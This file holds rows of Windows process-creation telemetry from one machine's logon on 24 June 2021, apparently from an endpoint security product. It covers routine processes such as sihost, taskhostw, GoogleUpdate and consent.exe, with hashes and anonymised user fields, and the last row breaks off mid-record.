+640,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:12.482287800+00:00,20184,sihost.exe,sihost.exe,PortableExecutable,2021-02-17 04:34:55.310848200+00:00,C:\Windows\System32\sihost.exe,111616,a21e7719d73d0322e2e7d61802cb8f80,8ee21a0ba8849d31c265b4090a9e2ebe8ba66f58a8f71d4e96509e8a78f7db00,5310ba14a05256e4d93e0b04338f53b4e1d680cb,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.903599+00:00,2304,svchost.exe,svchost.exe -k netsvcs -p -s UserManager,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.497556900+00:00,2021-06-24 00:53:26.859727600+00:00,aa0303d7-f568-494e-af35-7f28faa03d46,computerpii_0a470890c60768167990033d701e7bd881398861,167792,False,10.7740.19041.1052,False,11540474045136938,,11540474045175107,2021-06-10 00:46:10.903599+00:00,2304,2021-06-10 00:46:10.903599+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,2304,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,sihost.exe,sihost.exe,Shell Infrastructure Host
+641,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:12.551513500+00:00,12112,igfxEM.exe,"""igfxEM.exe""",PortableExecutable,2021-02-15 00:31:08.020416200+00:00,C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\igfxEM.exe,905992,b8fd0897854f7981f167e1777cd0dc9d,0eba09e7418a9d87da1edbfb77139d45af7ab11fa12ccdedb7580748eb600e2e,4a8d6e7d0e1f66810ba25052c964ddcdfa64e6eb,589225e24c347b06d38b7199fe40835f,b174678cfe4dc2359258a031cf51d9ef0f42cf3a7bf1b578e07220a2a33d6bdb,3810335bb57b6fa42ac6a1d0a2746279aa4d9d34,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.990538100+00:00,2852,igfxCUIService.exe,igfxCUIService.exe,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.648859700+00:00,2021-06-24 00:53:26.862473300+00:00,8be4fcd2-10c8-4217-ba03-fdad40daf95d,computerpii_0a470890c60768167990033d701e7bd881398861,167826,False,10.7740.19041.1052,False,11540474045136948,,11540474045175112,2021-06-10 00:46:10.990538100+00:00,2852,2021-06-10 00:46:10.990538100+00:00,\Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\igfxCUIService.exe,2852,128,ActiveProcessStartkey,C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65,418568,2020-06-16 21:07:57+00:00,2020-06-30 20:26:50+00:00,2021-06-10 00:46:11.069217900+00:00,2021-02-15 00:31:08.007448500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Intel Corporation,Intel(R) Common User Interface,6.15.100.8336,IGFXCUISERVICE,IGFXCUISERVICE.EXE,igfxCUIService Module,Intel Corporation,Intel(R) Common User Interface,6.15.100.8336,IGFXEM,IGFXEM.EXE,igfxEM Module
+642,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:12.585317800+00:00,20356,GoogleUpdate.exe,"""GoogleUpdate.exe"" /c",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.685488700+00:00,2021-06-24 00:53:26.862794600+00:00,d46821c2-cf86-4e60-afd2-ee17a130b176,computerpii_0a470890c60768167990033d701e7bd881398861,167830,False,10.7740.19041.1052,False,11540474045136925,,11540474045175113,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+643,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:12.596923700+00:00,18128,taskhostw.exe,taskhostw.exe USER,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.688239100+00:00,2021-06-24 00:53:26.862876900+00:00,57c06487-745e-4061-8664-1f647f3276dc,computerpii_0a470890c60768167990033d701e7bd881398861,167831,False,10.7740.19041.1052,False,11540474045136925,,11540474045175115,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+644,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:12.595119400+00:00,12688,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /c",PortableExecutable,2020-09-27 14:36:21.069830800+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,213392,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.689050600+00:00,2021-06-24 00:53:26.862960600+00:00,ddc03423-76e0-4583-8eb8-b7a17d5a1f46,computerpii_0a470890c60768167990033d701e7bd881398861,167832,False,10.7740.19041.1052,False,11540474045136925,,11540474045175114,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update
+645,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:12.634018300+00:00,12148,msoia.exe,"""msoia.exe"" scan upload",PortableExecutable,2021-05-17 00:47:47.018542700+00:00,C:\Program Files\Microsoft Office\root\Office16\msoia.exe,5260200,1c5600cf684054412e3c22caf8992864,c86a878eb2113e7c3d470a42b0b829b3abfb1b7cbc50499e9d00709097470eaa,de354752cd9eb2705342b7e75d06d6a18e034add,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.709326800+00:00,2021-06-24 00:53:26.863043+00:00,fc2e53fe-5447-4c88-ab84-811d9ddde6cc,computerpii_0a470890c60768167990033d701e7bd881398861,167833,False,10.7740.19041.1052,False,11540474045136925,,11540474045175116,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20634,msoia,msoia.exe,Office Telemetry Dashboard Agent (OTD msoia)
+646,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:12.690218300+00:00,4220,ApMsgFwd.exe,"""ApMsgFwd.exe"" -s{05FA8492-C047-4207-BE65-780D8591C113}",PortableExecutable,2019-11-05 04:39:28+00:00,C:\Windows\System32\DellTPad\ApMsgFwd.exe,78224,a0d01803ba23a100c85167aeb4d71443,119a56501865f1ad1b28d4200d8ad416263ac62f804d44382b3de1391316f11d,2a55b50b96ad8e4d6f3e591f95cfa9cd212e8c5c,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:12.279211200+00:00,9228,Apoint.exe,"""Apoint.exe""",False,2021-06-10 00:46:11.803639100+00:00,4428,\Device\HarddiskVolume3\Windows\System32\DellTPad\HidMonitorSvc.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.748393600+00:00,2021-06-24 00:53:26.863122300+00:00,7ac8f408-5820-40e1-a630-f84e14082d2a,computerpii_0a470890c60768167990033d701e7bd881398861,167834,False,10.7740.19041.1052,False,11540474045175105,,11540474045175117,2021-06-24 00:52:12.279211200+00:00,9228,2021-06-24 00:52:12.279211200+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\Apoint.exe,9228,18560,ActiveProcessStartkey,C:\Windows\System32\DellTPad,1191312,2019-09-24 17:35:09+00:00,2019-11-05 04:39:30+00:00,2021-06-24 00:52:12.271926500+00:00,2019-11-05 04:39:30+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver,"Alps Electric Co., Ltd.",ApMsgFwd,"8, 1, 0, 157",ApMsgFwd,ApMsgFwd.exe,ApMsgFwd
+647,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:12.716118500+00:00,5028,taskhostw.exe,taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E},PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.786149500+00:00,2021-06-24 00:53:26.863366+00:00,12d5736a-021d-47ce-ba1a-19ae950ab548,computerpii_0a470890c60768167990033d701e7bd881398861,167837,False,10.7740.19041.1052,False,11540474045136925,,11540474045175118,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+648,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:12.833640100+00:00,13428,userinit.exe,userinit.exe,PortableExecutable,2019-12-07 09:08:49.164262100+00:00,C:\Windows\System32\userinit.exe,34816,582a919ca5f944aa83895a5c633c122c,eda7ee39d4db8142a1e0788e205e80ae798035d60273e74981e09e98c8d0e740,6d0c6aea6bce05166761085b1d612558f81d877a,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:04:14.036541300+00:00,11720,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-23 11:04:13.923843100+00:00,14724,smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.905633600+00:00,2021-06-24 00:53:26.863522300+00:00,8547321d-785d-4450-a34f-fb45f06ac390,computerpii_0a470890c60768167990033d701e7bd881398861,167839,False,10.7740.19041.1052,False,11540474045175072,,11540474045175119,2021-06-23 11:04:14.036541300+00:00,11720,2021-06-23 11:04:14.036541300+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,11720,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-23 11:04:14.025533400+00:00,2021-04-14 01:10:22.046876900+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,2.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,userinit,USERINIT.EXE,Userinit Logon Application
+649,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-24 00:52:12.839211+00:00,12464,taskhostw.exe,taskhostw.exe,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.907419200+00:00,2021-06-24 00:53:26.863603800+00:00,5c37d03f-a152-432e-9e73-449641199c3a,computerpii_0a470890c60768167990033d701e7bd881398861,167840,False,10.7740.19041.1052,False,11540474045136925,,11540474045175120,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+650,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:12.874376600+00:00,14848,consent.exe,consent.exe 3388 452 000001C181D2EDD0,PortableExecutable,2021-02-17 04:35:10.855703500+00:00,C:\Windows\System32\consent.exe,166216,6646631ce4ad7128762352da81f3b030,56b2d516376328129132b815e22379ae8e7176825f059c9374a33cc844482e64,1095bd4b63360fc2968d75622aa745e5523428ab,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:47:25.157136200+00:00,3388,svchost.exe,svchost.exe -k netsvcs -p -s Appinfo,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.911505600+00:00,2021-06-24 00:53:26.863684700+00:00,4c4220e7-aad8-42d7-9f6d-b1bb5d602b58,computerpii_0a470890c60768167990033d701e7bd881398861,167841,False,10.7740.19041.1052,False,11540474045137067,,11540474045175122,2021-06-10 00:47:25.157136200+00:00,3388,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:47:25.530432200+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,consent,consent.exe,Consent UI for administrative applications
+651,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:12.855837100+00:00,13264,GoogleUpdate.exe,"""GoogleUpdate.exe"" /cr",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:52:12.585317800+00:00,20356,GoogleUpdate.exe,"""GoogleUpdate.exe"" /c",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.912162900+00:00,2021-06-24 00:53:26.863764600+00:00,d14692f4-a9bb-4c6e-814b-9f97abc96cc9,computerpii_0a470890c60768167990033d701e7bd881398861,167842,False,10.7740.19041.1052,False,11540474045175113,,11540474045175121,2021-06-24 00:52:12.585317800+00:00,20356,2021-06-24 00:52:12.585317800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,20356,128,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-23 01:50:56.366826900+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+652,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:13.030711100+00:00,10880,GoogleCrashHandler.exe,"""GoogleCrashHandler.exe""",PortableExecutable,2021-04-21 05:19:26.535730400+00:00,C:\Program Files (x86)\Google\Update\Ipv4PII_025de4296ab244d9ac811ef514f9d0b5ad63b5fd\GoogleCrashHandler.exe,293720,36cb86775385de4d906cc13b712486fc,6d67fc790835b85e7b14def65958d9b30e0f6e6bc6d4ead40960a3ca993353ed,eb686b0067eb804c9120d25004c959f938d10f29,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:52:12.585317800+00:00,20356,GoogleUpdate.exe,"""GoogleUpdate.exe"" /c",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:13.080083500+00:00,2021-06-24 00:53:26.864404400+00:00,2a4045a0-237b-4dcb-8979-f7eedd2f77fa,computerpii_0a470890c60768167990033d701e7bd881398861,167849,False,10.7740.19041.1052,False,11540474045175113,,11540474045175123,2021-06-24 00:52:12.585317800+00:00,20356,2021-06-24 